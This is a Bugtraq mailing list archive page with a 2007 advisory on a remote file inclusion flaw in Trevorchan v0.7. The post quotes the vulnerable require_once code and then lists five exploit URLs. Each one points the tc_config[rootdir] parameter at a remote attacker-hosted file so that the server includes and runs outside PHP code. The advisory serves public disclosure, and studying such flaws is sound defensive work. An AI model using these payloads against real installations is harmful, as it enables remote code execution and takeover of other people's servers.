Bugtraq mailing list archives
Trevorchan <= v0.7 Remote File Include Vulnerability
From: ilkerkandemir () mynet com
Date: 13 Jan 2007 11:33:28 -0000
------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script:Trevorchan v0.7 Download: http://rel.trevorchan.org/Releasev07.zip Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> Code: require_once($tc_config['rootdir']."/inc/functions.php"); require_once($tc_config['rootdir']."/inc/encryption.php"); ------------------------------------------------------------------------------------------------------------------- Exploit: upgrade.php?tc_config[rootdir]=http://attacker.txt? paint_save.php?tc_config[rootdir]=http://attacker.txt? menu.php?tc_config[rootdir]=http://attacker.txt? manage.php?tc_config[rootdir]=http://attacker.txt? banned.php?tc_config[rootdir]=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR Special Tnx: AYYILDIZ.ORG
Current thread:
- Trevorchan <= v0.7 Remote File Include Vulnerability ilkerkandemir (Jan 13)
- Re: Trevorchan <= v0.7 Remote File Include Vulnerability Stefano Zanero (Jan 16)